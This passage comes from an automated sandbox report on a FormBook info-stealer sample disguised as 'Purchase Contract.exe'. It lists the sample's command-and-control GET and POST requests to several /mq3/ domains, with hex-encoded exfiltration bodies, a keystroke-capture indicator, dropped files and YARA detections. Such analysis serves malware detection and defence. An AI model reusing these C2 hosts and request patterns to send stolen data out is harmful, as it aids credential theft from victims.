4f 66 34 5f 30 52 6b 4a 51 6f 37 4e 42 42 62 56 4e 69 62 46 62 52 6a 59 56 78 6a 69 6a 70 49 43 6d 38 35 74 34 7a 56 33 47 44 51 58 77 68 70 6b 39 6a 6b 36 51 5a 50 64 73 2d 53 4b 31 4d 48 61 6b 6c 5a 57 70 38 7e 4a 69 65 4c 63 38 44 49 4d 4a 53 37 34 56 6a 4a 44 47 6d 4a 41 7e 41 5a 58 52 41 4f 5a 36 5a 70 4d 4c 42 56 38 6d 66 4f 37 50 5f 52 6e 46 78 69 2d 56 34 69 56 39 46 77 5f 6a 76 4 Source: global traffic HTTP traffic detected: POST /mq3/ HTTP/1.1Host: www.vamojunto.comConnection: closeContent-Length: 155035Cache-Control: no-cacheOrigin: http://www.vamojunto.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.vamojunto.com/mq3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 78 6c 70 64 3d 4f 62 62 55 6b 71 7a 4a 67 57 41 6d 39 35 72 51 4c 42 56 79 47 71 6e 68 4d 6b 41 76 37 31 76 58 46 4d 4b 44 4f 36 49 36 70 77 31 59 51 51 72 54 56 6e 69 78 6b 69 77 43 28 42 38 43 6d 6b 72 6e 67 51 5a 5f 46 4b 74 2d 71 31 48 71 32 69 5a 35 74 6b 50 34 6b 36 6a 35 7e 44 6c 72 44 37 68 2d 6d 59 6e 41 28 38 69 79 7e 54 57 4a 36 4b 46 6a 50 4b 51 32 50 56 35 52 47 7a 61 32 59 56 57 55 7e 42 78 64 50 2d 31 62 63 52 61 43 44 63 6e 34 34 34 62 32 64 4e 6e 4c 67 70 6f 64 7e 46 69 78 72 34 54 4d 5a 56 53 68 53 5f 7a 61 6c 30 47 37 42 50 73 38 4b 61 35 4b 36 32 4d 78 6b 75 70 55 79 47 73 52 35 5a 41 37 53 66 57 36 34 43 56 6f 4e 6d 45 56 66 4d 46 77 76 35 75 6f 7e 6b 30 62 73 2d 4f 42 75 55 69 6b 49 73 32 54 44 57 73 71 50 75 73 33 4a 5f 6a 2d 73 58 63 66 54 4c 76 70 6c 32 49 58 7e 63 4e 38 4a 34 67 65 48 66 49 30 37 33 61 67 32 37 44 36 4e 45 30 55 37 53 47 72 61 37 33 6a 6c 42 77 75 71 6b 34 53 57 58 53 4d 30 44 73 6f 54 56 73 44 7e 56 6d 67 50 4a 35 49 73 4c 53 4e 75 43 67 67 48 75 50 79 65 51 63 6a 41 72 6b 71 5a 71 72 57 76 44 70 4a 4c 7a 33 62 38 33 51 35 72 37 7e 75 75 48 5a 46 4b 5f 64 78 68 37 58 6c 73 41 51 59 28 6f 65 34 51 70 6d 31 4d 55 6f 61 63 6a 52 51 41 36 77 45 44 30 33 4e 77 38 79 72 6d 4d 6c 57 6e 38 54 44 75 51 59 59 48 62 74 75 49 78 51 76 7e 6a 6e 56 52 61 64 71 37 52 62 46 6b 6b 43 77 33 32 78 68 49 6d 52 73 75 63 53 63 53 63 45 37 79 31 36 78 7a 4a 46 35 7e 7a 52 47 6d 70 34 79 28 52 61 54 6b 58 4c 72 4c 57 38 48 62 72 53 2d 4d 33 66 72 4b 31 53 59 34 6c 51 43 51 44 59 72 72 51 6e 42 49 61 33 76 6f 47 56 54 44 69 70 32 79 36 36 5a 56 39 5a 71 70 63 6f 4e 74 70 6c 6a 53 7a 71 51 6f 71 46 6a 6d 49 66 47 62 7a 42 75 77 54 50 78 4a 4c 49 62 70 46 55 6a 69 6e 62 43 34 37 70 56 64 72 48 68 31 32 76 6e 35 6b 78 44 61 59 35 4f 76 33 38 6d 65 61 53 74 72 69 74 51 54 4c 36 54 72 35 79 36 66 77 6a 36 44 4f 67 57 45 6c 30 4a 57 6c 76 68 4a 37 39 6d 44 4f 52 64 74 34 4d 79 48 79 44 70 59 53 65 30 79 67 34 7a 65 65 4f 46 75 72 50 39 6a 41 37 51 58 4a 41 4e 49 74 50 33 34 55 6e 49 75 4b 54 38 57 63 57 43 6b 34 4a 73 57 51 5a 70 6e 76 46 71 47 46 59 6c 75 2d 35 2d 56 5f 65 46 32 37 56 32 7e 4f 70 65 43 4d 57 4a 6e 69 55 31 39 4e 6b 67 34 54 4e 59 70 35 37 31 71 6e 6c 4d 67 72 65 55 33 2d 35 6b 31 61 66 4a 58 79 28 53 58 69 4a 45 41 2d 59 31 72 2d 66 6c 6e 5a 73 46 4d 47 73 57 79 64 39 4c 74 4c 63 79 6c 43 66 39 6b 55 79 6d 73 51 62 6f 46 4b 76 4c 61 65 55 78 67 55 41 46 77 57 54 7a 64 77 52 48 6a 47 4d 65 67 35 7e 4b 36 5f 72 5a 58 56 71 63 7a 51 7a 7a 37 43 59 6a 38 36 74 71 45 35 33 4f 72 41 70 78 79 75 47 52 52 48 68 47 52 69 4d 4
 Downloads files from webservers via HTTP Show sources
 Source: global traffic HTTP traffic detected: GET /mq3/?tpeDP4=aN6tXx&Kxlpd=jbVBrWG8kPPy1CntJKnIS/p3pTRMEOwQ7pcd0/8muHz8lgjxNZOf5/N47Cv4WKIkQI5C HTTP/1.1Host: www.bookwormegy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /mq3/?Kxlpd=usiFhkEA2/xQfSWIf5NGRhfLT8+t9rWHJvPEvA/+NM3yMCY4ViL3D3aLSorWeJjb+qc5&tpeDP4=aN6tXx HTTP/1.1Host: www.bridgejfc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /mq3/?tpeDP4=aN6tXx&Kxlpd=Ucg4IdL9jFr4XeSjaPMyHB4uwBktJa1xNFlwHiqXLBzLuD0Ne+QKmAu6UBl6f+0aCpLv HTTP/1.1Host: www.axcyl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /mq3/?Kxlpd=YpYaXTMBQs0E5vLJ/Yd9Yn8LoZOIuIOD62g1IdciXa5/abOgLLAXWzIHQlYdUNrQ6hv1&tpeDP4=aN6tXx HTTP/1.1Host: www.3dlasermaroc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /mq3/?tpeDP4=aN6tXx&Kxlpd=2djJOWHHKK7eyXP0GpI/PgPrp1f7EPZ+3gOEC9jiqnhi3aunmcDc7upH1tCFLL5Q3Er2 HTTP/1.1Host: www.porcber.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /mq3/?tpeDP4=aN6tXx&Kxlpd=bMzkr1fzZV+5QtXNWK4LXWvgw9C8VqyMR5lohTVdFC9G3pcizxH8g+YNb0t5pLB/ZO8J HTTP/1.1Host: www.yyw518.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /mq3/?Kxlpd=G5Xu6NHE4SkrvqPWXnU3UeXHC3kT8kLmWInNSoQ44xAbeTfsQH//0ntHgBoI/3bOih10&tpeDP4=aN6tXx HTTP/1.1Host: www.vamojunto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Performs DNS lookups Show sources
 Source: unknown DNS traffic detected: queries for: www.zcs-edu.com
 Posts data to webserver Show sources
 Source: unknown HTTP traffic detected: POST /mq3/ HTTP/1.1Host: www.bridgejfc.comConnection: closeContent-Length: 155035Cache-Control: no-cacheOrigin: http://www.bridgejfc.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bridgejfc.com/mq3/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 78 6c 70 64 3d 6d 4f 75 5f 28 41 35 4c 69 6f 59 44 41 52 47 4b 43 5f 38 51 4c 6b 76 50 63 65 69 76 71 4c 79 44 59 59 28 47 28 77 54 6c 4e 66 69 77 43 51 42 68 5a 33 7e 48 52 69 37 38 41 59 6d 73 5a 5a 76 44 76 76 67 39 6d 47 63 45 4f 77 28 6c 45 48 4c 52 6d 51 76 6e 4f 53 4c 4a 32 34 75 31 6b 4d 51 64 6f 62 70 6d 76 72 6d 4d 6e 62 53 74 67 6d 5a 50 59 66 75 64 68 38 30 4a 4d 51 4a 51 64 68 37 4e 75 7a 31 6e 4f 33 79 78 28 4f 4a 78 32 32 4d 79 6b 39 4f 4e 76 53 58 56 41 48 6c 77 6c 2d 41 42 69 58 31 59 36 59 30 39 6b 78 46 44 58 72 73 75 4a 76 4c 76 39 38 43 33 47 78 68 58 6e 67 6f 73 73 42 4f 30 64 5f 66 59 57 33 42 49 75 39 47 46 71 48 37 57 6a 44 62 50 5a 7a 77 50 67 46 41 46 4b 36 31 55 6a 63 5a 58 49 77 62 6f 69 48 71 2d 63 54 28 36 65 66 37 6c 46 49 4f 49 51 44 57 76 31 62 62 54 54 4e 78 58 71 5a 47 35 52 6b 7e 34 4a 54 71 67 6a 44 68 35 42 66 71 59 33 6f 41 33 38 76 75 38 36 55 45 42 66 71 4c 4f 31 4a 74 75 72 50 32 56 38 78 51 78 38 63 6c 44 36 72 4d 52 66 4d 63 41 62 47 73 62 4f 44 56 45 59 73 30 46 42 57 57 74 73 6d 55 77 51 72 51 42 44 69 4f 53 74 47 65 6a 36 48 6e 75 44 57 46 4a 75 34 48 74 63 61 75 34 78 63 65 71 7a 46 4c 34 4a 30 30 70 79 50 50 67 69 65 67 54 7e 62 57 36 4d 63 36 48 45 34 71 51 32 6f 39 33 62 5f 66 37 6b 73 4e 79 36 75 68 69 30 49 42 46 34 45 47 6f 6e 32 66 4d 56 7a 6f 46 68 4d 72 78 41 69 64 44 64 6f 54 6a 31 45 43 4e 47 36 71 35 28 30 67 33 33 34 63 2d 6e 4a 35 51 33 57 58 39 4f 53 33 79 73 67 4d 72 53 53 73 57 39 6c 62 68 61 56 41 48 6c 54 62 4f 37 4d 74 53 31 63 67 51 47 76 54 64 77 53 69 50 6a 46 77 61 4c 65 6d 55 53 72 52 50 66 58 52 63 72 74 4a 4b 65 74 68 62 78 39 4d 4c 76 36 67 34 74 31 5a 63 72 58 4b 6d 41 64 70 48 33 6f 51 59 38 5f 79 56 70 5f 32 47 67 2d 56 33 42 30 42 74 39 52 73 45 78 54 36 42 54 49 6f 63 6e 64 68 6c 68 72 7a 79 73 41 75 48 75 76 48 75 6b 57 68 6e 52 48 58 68 78 32 4a 74 41 6f 74 73 50 61 79 49 41 67 38 6b 52 33 69 51 78 6e 6a 47 57 58 35 41 33 5a 79 31 36 75 35 4a 47 7a 58 76 78 59 6f 41 32 4c 46 64 74 56 49 30 7a 59 74 7a 65 6d 68 6c 48 75 30 77 32 35 52 76 74 72 55 76 66 37 68 56 51 74 72 68 72 53 71 30 77 41 6c 31 63 56 30 4c 71 36 72 54 6e 70 43 66 52 50 4f 64 6d 44 78 52 31 75 4d 6d 76 45 65 42 43 44 73 69 33 30 35 65 6c 68 49 59 54 75 77 31 52 71 30 4c 70 61 69 78 30 6f 43 4d 43 57 31 4d 77 55 34 78 71 6f 6d 30 4a 68 53 34 48 32 4d 32 71 62 59 6e 31 70 4a 52 46 49 67 61 79 68 50 33 4b 48 66 79 39 56 55 45 47 2d 6d 61 58 48 45 43 4f 41 62 46 78 4b 36 76 71 55 67 6e 75 38 56 41 33 53 54 2d 76 52 4e 78 41 38 30 68 55 7a 74 66 71 68 4c 44 5a 46 67 57 4d 4c 6f 75 47 5f 50 48 46 33 4c 6
 Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable) Show sources
 Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 28 Apr 2020 01:16:56 GMTContent-Type: text/htmlContent-Length: 153Connection: closeServer: nginx/1.16.1Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 404 Not Found

nginx/1.16.1
 Urls found in memory or binary data Show sources

#### Key, Mouse, Clipboard, Microphone and Screen Capturing:

 Creates a DirectInput object (often for capturing keystrokes) Show sources
 Source: Purchase Contract.exe, 00000000.00000002.809580346.00000000011A0000.00000004.00000020.sdmp Binary or memory string:

#### E-Banking Fraud:

 Yara detected FormBook Show sources
 Source: Yara match File source: 00000003.00000002.2006818484.0000000002960000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000D.00000002.1173710759.0000000005AC0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000D.00000002.1173061376.00000000058F0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000003.00000002.2004131624.00000000000A0000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.810255686.0000000003F45000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.1185291001.00000000049A0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000E.00000002.1169125145.0000000000C20000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000D.00000002.1170396404.0000000004215000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.813188123.00000000054A0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000010.00000002.1182644946.00000000007C0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.813243423.00000000054D0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000D.00000002.1172899855.00000000057C0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.1185813243.0000000004C50000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.1185451229.0000000004AE0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0000000F.00000002.1181813052.0000000003395000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.813092522.0000000005370000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 0.2.Purchase Contract.exe.5370000.3.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 15.2.updategtmlg.exe.49a0000.3.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 13.2.updategtmlg.exe.57c0000.4.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 15.2.updategtmlg.exe.49a0000.3.unpack, type: UNPACKEDPE Source: Yara match File source: 13.2.updategtmlg.exe.57c0000.4.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.Purchase Contract.exe.5370000.3.unpack, type: UNPACKEDPE

#### System Summary:

 Detected FormBook malware Show sources
 Source: C:\Windows\SysWOW64\control.exe Dropped file: C:\Users\user\AppData\Roaming\72R9-CPB\72Rlogri.ini Jump to dropped file Source: C:\Windows\SysWOW64\control.exe Dropped file: C:\Users\user\AppData\Roaming\72R9-CPB\72Rlogrf.ini Jump to dropped file Source: C:\Windows\SysWOW64\control.exe Dropped file: C:\Users\user\AppData\Roaming\72R9-CPB\72Rlogrv.ini Jump to dropped file
 Malicious sample detected (through community Yara rule) Show sources
 Source: 00000003.00000002.2006818484.0000000002960000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000003.00000002.2006818484.0000000002960000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000D.00000002.1173710759.0000000005AC0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000D.00000002.1173710759.0000000005AC0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000D.00000002.1173061376.00000000058F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000D.00000002.1173061376.00000000058F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000003.00000002.2004131624.00000000000A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000003.00000002.2004131624.00000000000A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000000.00000002.810255686.0000000003F45000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000000.00000002.810255686.0000000003F45000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000F.00000002.1185291001.00000000049A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000F.00000002.1185291001.00000000049A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000E.00000002.1169125145.0000000000C20000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000E.00000002.1169125145.0000000000C20000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000D.00000002.1170396404.0000000004215000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000D.00000002.1170396404.0000000004215000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000000.00000002.813188123.00000000054A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000000.00000002.813188123.00000000054A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000010.00000002.1182644946.00000000007C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000010.00000002.1182644946.00000000007C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000000.00000002.813243423.00000000054D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000000.00000002.813243423.00000000054D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000D.00000002.1172899855.00000000057C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000D.00000002.1172899855.00000000057C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000F.00000002.1185813243.0000000004C50000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000F.00000002.1185813243.0000000004C50000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000F.00000002.1185451229.0000000004AE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000F.00000002.1185451229.0000000004AE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0000000F.00000002.1181813052.0000000003395000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0000000F.00000002.1181813052.0000000003395000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 00000000.00000002.813092522.0000000005370000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 00000000.00000002.813092522.0000000005370000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0.2.Purchase Contract.exe.5370000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0.2.Purchase Contract.exe.5370000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 15.2.updategtmlg.exe.49a0000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 15.2.updategtmlg.exe.49a0000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 13.2.updategtmlg.exe.57c0000.4.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 13.2.updategtmlg.exe.57c0000.4.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 15.2.updategtmlg.exe.49a0000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 15.2.updategtmlg.exe.49a0000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 13.2.updategtmlg.exe.57c0000.4.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 13.2.updategtmlg.exe.57c0000.4.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com Source: 0.2.Purchase Contract.exe.5370000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group Source: 0.2.Purchase Contract.exe.5370000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
 Initial sample is a PE file and has a suspicious name Show sources
 Source: initial sample Static PE information: Filename: Purchase Contract.exe
 Contains functionality to call native functions Show sources
 Detected potential crypto function Show sources
 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05E01DE3 0_2_05E01DE3 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05E1D5D2 0_2_05E1D5D2 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05E0FDDB 0_2_05E0FDDB Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05DFE58A 0_2_05DFE58A Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05E1E581 0_2_05E1E581 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05D50D40 0_2_05D50D40 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05DFC53F 0_2_05DFC53F Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05D71530 0_2_05D71530 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05E11D1B 0_2_05E11D1B Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05E22519 0_2_05E22519 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05E144EF 0_2_05E144EF Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05E1DCC5 0_2_05E1DCC5 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05E13490 0_2_05E13490 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05E22C9A 0_2_05E22C9A Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05E21C9F 0_2_05E21C9F Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05D8547E 0_2_05D8547E Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05D71410 0_2_05D71410 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05E0F42B 0_2_05E0F42B Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05D6740C 0_2_05D6740C Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05D567D0 0_2_05D567D0 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05E21FCE 0_2_05E21FCE Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05D75790 0_2_05D75790 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05E12782 0_2_05E12782 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05E21746 0_2_05E21746 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05E226F8 0_2_05E226F8 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05E13E96 0_2_05E13E96 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05E1CE66 0_2_05E1CE66 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05D77640 0_2_05D77640 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05D85E70 0_2_05D85E70 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05D84E61 0_2_05D84E61 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05D86611 0_2_05D86611 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05E219E2 0_2_05E219E2 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05E161DF 0_2_05E161DF Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05D86180 0_2_05D86180 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05E2D9BE 0_2_05E2D9BE Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05D8594B 0_2_05D8594B Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05D79110 0_2_05D79110 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05D87110 0_2_05D87110 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05DA9906 0_2_05DA9906 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05E228E8 0_2_05E228E8 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05D848CB 0_2_05D848CB Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05D6A080 0_2_05D6A080 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05E018B6 0_2_05E018B6 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05D81070 0_2_05D81070 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05D89810 0_2_05D89810 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05E1D016 0_2_05E1D016 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05D8E020 0_2_05D8E020 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05D80021 0_2_05D80021 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05D863C2 0_2_05D863C2 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05D5EBE0 0_2_05D5EBE0 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05D84B96 0_2_05D84B96 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05D7FB40 0_2_05D7FB40 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05D78B00 0_2_05D78B00 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05E222DD 0_2_05E222DD Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05D742B0 0_2_05D742B0 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05E21A99 0_2_05E21A99 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05D84A5B 0_2_05D84A5B Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05E10A02 0_2_05E10A02 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05D8523D 0_2_05D8523D Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05E2E214 0_2_05E2E214 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_010A1C88 0_2_010A1C88 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_010A0BC9 0_2_010A0BC9 Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_010A0640 